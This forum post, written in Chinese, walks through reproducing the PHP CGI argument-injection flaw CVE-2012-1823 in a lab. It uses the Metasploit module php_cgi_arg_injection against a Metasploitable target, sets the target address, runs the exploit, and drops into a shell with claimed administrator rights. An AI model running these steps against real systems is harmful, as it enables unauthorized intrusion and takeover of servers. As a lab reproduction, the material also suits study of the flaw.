Jump to content

  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

PHP CGI漏洞利用

 Share
HACK1949

By HACK1949,
in ios/Android development

Recommended Posts

HACK1949 Grand Master

HACK1949

Posted
Posted

PHP CGI漏洞利用

今日复现一个早期的漏洞,PHP CGI漏洞,代号为cve:2012-1823,该漏洞暂时只能攻击linux系统,属于linux漏洞

使用工具:攻击机kali linux、靶机metasploitable linux

具体步骤如下:

1.登入msfconsloe

image

2.搜索漏洞代号,输入 search cve:2012-1823

image

3.复制粘贴exploit/multi/http/php_cgi_arg_injection 或者use 0

详细如下:
msf > use exploit/multi/http/php_cgi_arg_injection
或者
msf > use 0
image

4.进行相关设置

msf6 exploit(multi/http/php_cgi_arg_injection) > set rhosts 192.168.30.141
rhosts => 192.168.30.141
msf6 exploit(multi/http/php_cgi_arg_injection) >
msf6 exploit(multi/http/php_cgi_arg_injection) > show options
image

5.开始攻击

msf6 exploit(multi/http/php_cgi_arg_injection) > exploit
image

6.攻击成功,输入shell,可进入被攻击方的命令提示符,权限为系统管理员权限

meterpreter > shell
image

Link to post
Link to comment
Share on other sites
 Share
Go to topic listing

discussion group

discussion group

  
    You don't have permission to chat.

    • Recently Browsing   0 members

      • No registered users viewing this page.

    黑客世界站内导航 (SITE MAP)

    ×
    ×
    • Create New...